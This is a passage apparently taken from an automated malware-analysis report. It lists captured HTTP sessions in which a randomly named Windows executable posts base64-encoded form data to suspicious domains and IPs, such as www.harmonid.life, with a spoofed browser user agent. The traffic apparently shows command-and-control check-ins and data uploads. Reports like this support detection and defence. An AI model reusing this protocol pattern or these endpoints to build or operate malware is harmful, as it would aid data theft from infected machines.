FLL4t=oLWKSJnQTRF0UpslRybbR63GWZCBzwmVnwNGcUKdNIeMaehIHi+K/CexQeDmDWY6WL/VECtQaV+0SFRXI7LbbspbeJDBTSFOQ0K/BlnqcnRAQWD30aATGvC6qgA0glLaxkuENIM62SAE+00o0cA8/DYSJvgSB9IsGSTgau8dV1yYmrk1J+gUchqpZ17UjnjF8yGU7oqE46oX2nrZfPssBDrspDYLNiMGvNik77woLdUmSmbFkf7U514l45yktjWeNsxwRF+fEqBh2yXpJ3oPOCxIfYOr2VEvdZ72J2oGi1OLIF/ucAwPweCALX7jSH6CcXHYZnazEFQx7MP5b+C0d11mTdP1smS9eyiG5LZ0Wnt0IfivP6aVLO60k/hFLcYmi4QywOyIjG2QMe1no9jia5gWLuy1lVVO7N2L9PFxvWxXxFli+o3JY/IuYUtw8Qng2VlO24py8GPN0qFnc9H02Iz9iw36VPPf7sqtmdcd+VywLsp/5gdLP8xxrphtw8rKgLrGJ9yWg/WUThxTCkE7kFVD17xNFTvvizr+uIM2D9Nx96gYUVlEN9SWysiSOqv3D/EPE4j/N7M+9EHHeJobrhqg1G1PC4nCp1avbZCZjkdfBTxih8Ki7cCHc4yXxFsqfyoUtKn7+gGSZ+BYqG171jwFFXa3trODN8+XPcwSQjII1C0fGFFU/cDC765CnEiJvJk0qD00ZBhz+fST7ELGj85Sp4lLnb06AmfpesdLuKHGRV4CO+FOftwWsZfIxGZcNzBcWMZfX4SmjAM8wnZx+JLcD+e8+ctwXIaassgBcD4INrrtrZVlRCRkbx5bRrb8OKpDmxff86thZ9KDBPGPq/aF99BNBDO+UB9gTJ7/np0+l0VBY/X81WbcXi2aVZWp/zCxJQ3TMywPvWYg7zR/9wjpna3zT0LoxTFjiTyo9Br7ZyufTvLyBIl75u7gxIHs28KzVH5m9gy3vUXwHCMywm1Cna0x9WexboXU7avB4K4VKl [TRUNCATED]
Nov 5, 2024 07:13:37.975743055 CET	335	IN	HTTP/1.1 404 Server: nginx/1.24.0 Date: Tue, 05 Nov 2024 06:13:37 GMT Content-Type: application/json;charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers Data Raw: 34 32 0d 0a 7b 22 63 6f 64 65 22 3a 22 34 30 31 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 72 61 6d 65 74 65 72 20 74 6f 6b 65 6e 20 69 73 20 6e 75 6c 6c 22 2c 22 73 75 63 63 65 73 73 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 42{"code":"401","message":"Parameter token is null","success":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50031	3.111.160.216	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:13:39.436156034 CET	442	OUT	GET /aajw/?FLL4t=lJ+qR9qEWHtEYfdYXX38H63zdICQzTmBsURfekuXE7iDW/5kFwCD5SzXO8//IXYeWe3pPDw5e3u+RAlULoDse9ZEd7r2QSdjEk66OCO0EG57H2Th8v5BKcw=&ezK=xFOxVPb0UzRXXPy HTTP/1.1 Host: www.comvq.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Nov 5, 2024 07:13:40.522814035 CET	335	IN	HTTP/1.1 404 Server: nginx/1.24.0 Date: Tue, 05 Nov 2024 06:13:40 GMT Content-Type: application/json;charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers Data Raw: 34 32 0d 0a 7b 22 63 6f 64 65 22 3a 22 34 30 31 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 72 61 6d 65 74 65 72 20 74 6f 6b 65 6e 20 69 73 20 6e 75 6c 6c 22 2c 22 73 75 63 63 65 73 73 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 42{"code":"401","message":"Parameter token is null","success":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50032	203.161.49.193	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:13:46.031358004 CET	708	OUT	POST /aq3t/ HTTP/1.1 Host: www.harmonid.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 202 Content-Type: application/x-www-form-urlencoded Origin: http://www.harmonid.life Referer: http://www.harmonid.life/aq3t/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 34 4d 58 66 4d 37 79 4e 75 43 73 67 33 49 4b 45 6f 78 64 44 4b 6e 57 4a 43 2b 55 42 37 74 53 2b 45 64 7a 6b 74 2f 79 59 48 4d 63 57 70 52 4b 5a 34 57 76 46 47 48 61 6a 37 76 31 7a 30 79 6c 78 45 67 4d 5a 53 6d 72 50 6f 53 72 66 54 51 6d 4a 58 6b 46 2f 2f 6e 70 73 76 75 6f 32 69 53 70 36 54 47 66 77 54 41 46 33 4e 34 63 35 79 68 47 72 76 6a 79 57 68 34 7a 35 62 34 56 73 67 73 4b 54 61 74 39 6c 53 31 33 4a 49 4f 6b 72 69 69 55 61 6f 74 50 6a 71 44 46 4a 71 7a 4a 67 4d 73 4d 43 4f 6c 61 59 6e 4b 32 52 34 6a 44 33 7a 78 35 44 38 71 70 2f 38 73 4c 63 50 44 74 59 34 49 6a 2b 34 67 3d 3d Data Ascii: FLL4t=4MXfM7yNuCsg3IKEoxdDKnWJC+UB7tS+Edzkt/yYHMcWpRKZ4WvFGHaj7v1z0ylxEgMZSmrPoSrfTQmJXkF//npsvuo2iSp6TGfwTAF3N4c5yhGrvjyWh4z5b4VsgsKTat9lS13JIOkriiUaotPjqDFJqzJgMsMCOlaYnK2R4jD3zx5D8qp/8sLcPDtY4Ij+4g==
Nov 5, 2024 07:13:46.727004051 CET	533	IN	HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 06:13:46 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50033	203.161.49.193	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:13:48.577876091 CET	728	OUT	POST /aq3t/ HTTP/1.1 Host: www.harmonid.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 222 Content-Type: application/x-www-form-urlencoded Origin: http://www.harmonid.life Referer: http://www.harmonid.life/aq3t/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 34 4d 58 66 4d 37 79 4e 75 43 73 67 32 72 69 45 74 57 4a 44 4d 48 57 4b 47 4f 55 42 78 4e 53 36 45 64 50 6b 74 39 65 79 48 2b 34 57 6f 77 61 5a 35 54 44 46 48 48 61 6a 7a 50 31 79 72 43 6c 36 45 67 51 76 53 69 6a 50 6f 53 76 66 54 52 32 4a 58 56 46 38 74 48 70 71 6d 4f 6f 77 74 79 70 36 54 47 66 77 54 41 67 53 4e 34 30 35 7a 53 4f 72 74 43 79 56 2f 6f 7a 2b 63 34 56 73 7a 38 4b 58 61 74 38 41 53 33 54 6a 49 49 67 72 69 6d 51 61 70 2f 6e 67 7a 54 46 50 70 44 49 73 64 76 70 46 45 33 66 51 67 4c 48 77 36 67 2b 62 37 58 30 5a 74 62 49 6f 75 73 76 76 53 45 6b 73 31 4c 65 33 6a 6a 63 4b 49 49 45 33 35 56 30 4c 57 66 64 6f 42 39 49 63 7a 6e 30 3d Data Ascii: FLL4t=4MXfM7yNuCsg2riEtWJDMHWKGOUBxNS6EdPkt9eyH+4WowaZ5TDFHHajzP1yrCl6EgQvSijPoSvfTR2JXVF8tHpqmOowtyp6TGfwTAgSN405zSOrtCyV/oz+c4Vsz8KXat8AS3TjIIgrimQap/ngzTFPpDIsdvpFE3fQgLHw6g+b7X0ZtbIousvvSEks1Le3jjcKIIE35V0LWfdoB9Iczn0=
Nov 5, 2024 07:13:49.265006065 CET	533	IN	HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 06:13:49 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50034	203.161.49.193	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:13:51.131966114 CET	10810	OUT	POST /aq3t/ HTTP/1.1 Host: www.harmonid.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 10302 Content-Type: application/x-www-form-urlencoded Origin: http://www.harmonid.life Referer: http://www.harmonid.life/aq3t/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 34 4d 58 66 4d 37 79 4e 75 43 73 67 32 72 69 45 74 57 4a 44 4d 48 57 4b 47 4f 55 42 78 4e 53 36 45 64 50 6b 74 39 65 79 48 2b 77 57 70 41 47 5a 34 30 33 46 45 48 61 6a 35 76 31 33 72 43 6c 6a 45 67 59 7a 53 69 76 35 6f 52 62 66 53 7a 75 4a 48 68 70 38 6e 48 70 71 6b 4f 6f 78 69 53 70 76 54 43 37 30 54 41 51 53 4e 34 30 35 7a 54 2b 72 71 54 79 56 34 59 7a 35 62 34 56 77 67 73 4c 79 61 74 6c 39 53 33 48 5a 49 59 41 72 6a 47 41 61 71 4c 48 67 37 54 46 4e 73 44 4a 78 64 76 56 4b 45 33 44 32 67 4c 79 6c 36 6e 57 62 2b 67 78 31 38 66 4a 79 77 64 4c 46 4d 6e 34 30 35 70 61 53 36 54 45 6a 42 39 4d 41 70 58 49 38 4d 34 34 32 57 65 45 4b 72 42 62 51 57 68 53 78 4f 51 31 52 30 4d 78 74 51 66 44 7a 4c 61 42 66 4d 54 7a 42 58 67 38 70 52 44 64 66 64 6b 37 38 2f 7a 74 34 52 55 41 6d 6f 78 59 43 46 4a 36 54 6d 6f 6e 62 76 78 71 4e 38 43 44 42 32 45 79 6d 7a 50 33 66 76 33 4a 68 4c 78 7a 74 41 68 45 55 68 32 52 49 5a 30 49 48 41 38 55 65 6b 59 67 36 6c 51 33 72 63 53 68 5a 47 6c 6e 41 63 70 61 47 [TRUNCATED] Data Ascii: FLL4t=4MXfM7yNuCsg2riEtWJDMHWKGOUBxNS6EdPkt9eyH+wWpAGZ403FEHaj5v13rCljEgYzSiv5oRbfSzuJHhp8nHpqkOoxiSpvTC70TAQSN405zT+rqTyV4Yz5b4VwgsLyatl9S3HZIYArjGAaqLHg7TFNsDJxdvVKE3D2gLyl6nWb+gx18fJywdLFMn405paS6TEjB9MApXI8M442WeEKrBbQWhSxOQ1R0MxtQfDzLaBfMTzBXg8pRDdfdk78/zt4RUAmoxYCFJ6TmonbvxqN8CDB2EymzP3fv3JhLxztAhEUh2RIZ0IHA8UekYg6lQ3rcShZGlnAcpaGclNRYrf5YA+L3Nl59PgUXIJo5WgMcw8aiVNosKjuG9n575YQ3DxbdMEjd25Mvo7v7pdbeHwcCjRtum62BG4XuXt2MZyIyXjPjtl6CymZ01RrlTQO3d4uYQrb6KQQQB3YYkT/3xyHfRGir82xopnfKDk8MRv2f6Veso+xVdTJmp/SiSpliPc8INNo0fJsEKKL2IO5VTQV4bAhwDBDBht5AuYTWGljvPzJcCtTn2VS0Fd69BsSeR+eFjRpocSm8MNPmHTgRYA0Vnn/JRSGfjE91z5U6bv6/N1HuKGiBruUgTGheqA8TAKdkSHvNo3BDzjo0Fsd3CUuTzLUxiOg5yUTa+94o8enBSr0XZVWMz2uMrW3DNlvite0j9/Sq92qeD1Ts8gATuz19ZaKWBTQtIXuK1qIRfP1uODzhKlU3dfijFa5WyJWEWkcJF5ZlNoceOea9pInqkqoQfUyQ7HBpp4rVHIeJ90EPGyYA39/L35KXyOc3F2Mdc0+CD+IjJDA48JNMGkys9tAomCk+7h/4EnmMoNIXBOeBYNSMZyrz2tOt3KJNMQpl/4MHfsSMpBexN2y8NZuVGhNHlu7/Y9pffZByn4rf7RF5jWo5rmjevQrtK1iAowMRk/d5O5+s1qydMfgUQjMgu1tF7FdEssTMBdKYhIQ2VtuWY1w3o [TRUNCATED]
Nov 5, 2024 07:13:51.857953072 CET	533	IN	HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 06:13:51 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50035	203.161.49.193	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:13:53.672677994 CET	446	OUT	GET /aq3t/?FLL4t=1O//PO/cqhkw/M+6iRVvEUqUFpAHj9+zOvfmk/yFAMIwiCaNxlH8ewyD3Z9q+hl0ISYsRyjGuCz6Y2WWdkpFnlpJlJcmiRtBOVbaf0BxDZMN5gC7nH7np4E=&ezK=xFOxVPb0UzRXXPy HTTP/1.1 Host: www.harmonid.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Nov 5, 2024 07:13:54.352780104 CET	548	IN	HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 06:13:54 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50036	188.114.97.3	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:13:59.525758982 CET	732	OUT	POST /r2pg/ HTTP/1.1 Host: www.figa1digital.services Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 202 Content-Type: application/x-www-form-urlencoded Origin: http://www.figa1digital.services Referer: http://www.figa1digital.services/r2pg/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 6d 32 35 45 54 76 54 49 65 48 79 41 62 42 49 73 6d 71 52 56 63 65 56 51 69 2f 72 63 71 59 70 58 36 79 38 54 6e 58 59 4c 39 6e 67 2b 63 75 7a 4b 76 6d 67 39 62 38 55 69 38 45 46 36 4f 34 63 50 6e 53 74 61 4a 2f 45 4e 5a 7a 6f 51 65 55 49 62 77 62 66 2f 65 35 59 41 41 43 44 54 34 68 6a 53 55 50 58 47 50 31 4c 74 46 30 4a 49 4e 6b 68 7a 47 30 45 2f 48 47 6a 59 62 76 6d 4c 62 73 67 48 36 70 71 46 65 30 4f 68 64 6f 77 44 34 31 7a 34 45 37 7a 53 62 4d 72 38 7a 79 41 68 78 4b 6b 59 71 4b 4b 48 6b 51 50 4e 38 6d 42 50 6e 62 2f 57 66 6e 71 39 7a 54 30 42 39 48 77 74 38 53 77 72 59 67 3d 3d Data Ascii: FLL4t=m25ETvTIeHyAbBIsmqRVceVQi/rcqYpX6y8TnXYL9ng+cuzKvmg9b8Ui8EF6O4cPnStaJ/ENZzoQeUIbwbf/e5YAACDT4hjSUPXGP1LtF0JINkhzG0E/HGjYbvmLbsgH6pqFe0OhdowD41z4E7zSbMr8zyAhxKkYqKKHkQPN8mBPnb/Wfnq9zT0B9Hwt8SwrYg==
Nov 5, 2024 07:14:00.218991995 CET	1236	IN	HTTP/1.1 520 Date: Tue, 05 Nov 2024 06:14:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 7243 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZCULfoPNOaCQw1Kd%2BIN8IRf2uqGPL81idvZVAZu3MMo5AzDdpsXrPFHrJWq6P6eT8TthCuZci9FXCXLtgv6uEJZ1HTR9x5u59zfBkhe0xZDM5wtl3m2bhtJ2w6V2KrI9UIB%2F01CHMh7fnS6c"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8ddab37a5eeb287b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2017&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=732&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--
Nov 5, 2024 07:14:00.219017982 CET	1236	IN	Data Raw: 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 66 69 67 61 31 64 69 67 69 74 61 6c 2e 73 65 72 76 69 63 65 73 20 7c 20 35 32 30 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 72 65 74 75 72 6e 69 6e 67 20 61 6e 20 75 6e 6b 6e Data Ascii: ><head><title>www.figa1digital.services \| 520: Web server is returning an unknown error</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=E
Nov 5, 2024 07:14:00.219034910 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 79 2d 38 20 62 67 2d 67 72 61 64 69 65 6e 74 2d 67 72 61 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c Data Ascii: <div class="my-8 bg-gradient-gray"> <div class="w-240 lg:w-full mx-auto"> <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md
